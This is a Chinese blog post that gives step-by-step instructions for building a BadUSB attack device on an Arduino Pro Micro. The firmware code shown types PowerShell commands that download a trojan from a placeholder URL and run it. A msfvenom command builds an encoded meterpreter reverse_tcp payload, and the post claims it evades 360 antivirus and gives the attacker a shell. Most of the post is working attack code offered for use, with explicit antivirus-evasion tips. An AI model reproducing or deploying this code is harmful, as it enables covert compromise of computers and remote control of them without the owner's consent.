我是靠谱客的博主 坚定云朵,这篇文章主要介绍系统安全-BadUsb代码以及木马远控的制作(可绕过360),现在分享给大家,希望可以做个参考。

漏洞背景

是今年计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在今年的BlackHat安全大会上公布。BadUsb号称是世界上最邪恶的USB外设。笔者使用他们的代码做了个类似的U盘,用户插入U盘,就会自动执行预置在固件中的恶意代码,下载服务器上恶意文件,执行恶意操作….

硬件准备

这里我们使用的是:
BS Micro pro micro leonardo Arduino 开发板(某宝里面买的)
在这里插入图片描述

硬件代码

复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#include <Keyboard.h> void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(1000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press(‘r’);//r键 delay(300); Keyboard.release(KEY_LEFT_GUI);//释放win 键 Keyboard.release(‘r’);//释放R键 Keyboard.press(KEY_CAPS_LOCK);//切换大小写,绕过输入法 Keyboard.release(KEY_CAPS_LOCK); Keyboard.println(“cmd “); delay(200); Keyboard.press(KEY_RETURN);//按下回车键 delay(200); Keyboard.release(KEY_RETURN);//按下回车键 delay(500); Keyboard.println(“powershell “); Keyboard.press(KEY_RETURN);//按下回车键 delay(200); Keyboard.release(KEY_RETURN);//按下回车键 delay(500); Keyboard.println(“$clnt = new-object System.Net.WebClient; “); Keyboard.press(KEY_RETURN);//按下回车键 delay(200); Keyboard.release(KEY_RETURN);//按下回车键 delay(500); Keyboard.println(“$url= ‘**********木马地址******’; “); Keyboard.press(KEY_RETURN);//按下回车键 delay(200); Keyboard.release(KEY_RETURN);//按下回车键 delay(500); Keyboard.println(“$file = ‘ D:\server.exe’; “); Keyboard.press(KEY_RETURN);//按下回车键 delay(200); Keyboard.release(KEY_RETURN);//按下回车键 delay(500); Keyboard.println(“$clnt.DownloadFile($url,$file); “); Keyboard.press(KEY_RETURN);//按下回车键 delay(200); Keyboard.release(KEY_RETURN);//按下回车键 delay(500); Keyboard.println(“START D:\server.exe “); Keyboard.press(KEY_RETURN); delay(500); Keyboard.release(KEY_RETURN); delay(500); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }

注:我们通过分步进行cmd批处理里面的powershell 命令,这样可以绕过杀毒软件的拦截。

木马地址:是我们已经将做好的木马放在外网服务器的地址,对于木马的制作我下面会讲

木马制作(可绕过360检测)

使用工具:kali系统、vc++6.0

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘x00’ lhost=192.168.1.157 lport=5555 -f c -o /root/Desktop/sha.c

e参数指定编码方式,i参数指定编码次数,b参数去除指定代码,一般是空代码或者错误代码, lhost本机地址,lport监听的端口,-f指定生成格式,-o指定输出路径。

执行上述代码之后,会生成sha.c,名字可以随意,

打开sha.c文件,其中代码为:在这里插入图片描述
再将代码用vc++做成软件(注意要c语言的头文件,c语言基础)即可…亲自检测可以绕过360检测

目标机运行木马程序程序,就能拿到shell
在这里插入图片描述

复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
补充arduino按键代码 delay(5000);//延时毫秒 Keyboard.begin(); //开始键盘通讯 Keyboard.end(); //结束键盘通讯 Keyboard.press(); //按下键盘按键 如果是非特殊按键如 数字、字母按键用单引号括起来 Keyboard.release(); //释放键盘按键 Keyboard.println(“”); //输入字符串使用双引号括起来 Mouse.begin();//鼠标事件开始 Mouse.click();//鼠标单击 Mouse.end();//鼠标事件结束 Mouse.move();//鼠标移动(x,y) Mouse.press();//鼠标按下 Mouse.release();//鼠标松开 Mouse.isPressed();// KEY_LEFT_CTRL KEY_LEFT_SHIFT KEY_LEFT_ALT KEY_LEFT_GUI //win键 KEY_RIGHT_CTRL KEY_RIGHT_SHIFT KEY_RIGHT_ALT KEY_RIGHT_GUI KEY_UP_ARROW KEY_DOWN_ARROW KEY_LEFT_ARROW KEY_RIGHT_ARROW KEY_BACKSPACE KEY_TAB KEY_RETURN//回车键 KEY_ESC KEY_INSERT KEY_DELETE KEY_PAGE_UP KEY_PAGE_DOWN KEY_HOME KEY_END KEY_CAPS_LOCK KEY_F1 KEY_F2 KEY_F3 KEY_F4 KEY_F5 KEY_F6 KEY_F7 KEY_F8 KEY_F9 KEY_F10 KEY_F11 KEY_F12

最后

以上就是坚定云朵最近收集整理的关于系统安全-BadUsb代码以及木马远控的制作(可绕过360)的全部内容,更多相关系统安全-BadUsb代码以及木马远控内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(73)

评论列表共有 0 条评论

立即
投稿
返回
顶部